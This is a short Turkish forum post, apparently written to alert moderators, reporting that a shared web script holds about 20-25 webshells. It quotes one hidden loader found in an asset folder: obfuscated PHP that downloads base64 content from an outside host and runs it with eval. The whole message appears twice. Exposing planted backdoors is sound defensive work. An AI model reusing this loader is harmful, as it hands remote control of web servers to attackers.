merhaba,
bu konuda bulunan scripti taramaya sokunca içinde 20-25'e yakın webshell buldu. Şüphelenerek bir betik yazdım ve tarattım:
assets\css\vendor path'ine 1b.php yerleştirilmiş. Kodları incelediğimde uzaktan veri çektiğini gördüm
kodlar:
<?php
$otuzbir = 'ba'.'se'. 128/2 .'_' .'de'.'co'.'de';
$otuziki = ("http://b0ru70.github.io/gg");
$otuzuc = file_get_contents($otuziki);
eval("?>".($otuzbir($otuzuc)));
?>yönetimin bilgisine, ayrıca 5-6 tane daha saklı şey var
bu konuda bulunan scripti taramaya sokunca içinde 20-25'e yakın webshell buldu. Şüphelenerek bir betik yazdım ve tarattım:
assets\css\vendor path'ine 1b.php yerleştirilmiş. Kodları incelediğimde uzaktan veri çektiğini gördüm
kodlar:
<?php
$otuzbir = 'ba'.'se'. 128/2 .'_' .'de'.'co'.'de';
$otuziki = ("http://b0ru70.github.io/gg");
$otuzuc = file_get_contents($otuziki);
eval("?>".($otuzbir($otuzuc)));
?>yönetimin bilgisine, ayrıca 5-6 tane daha saklı şey var


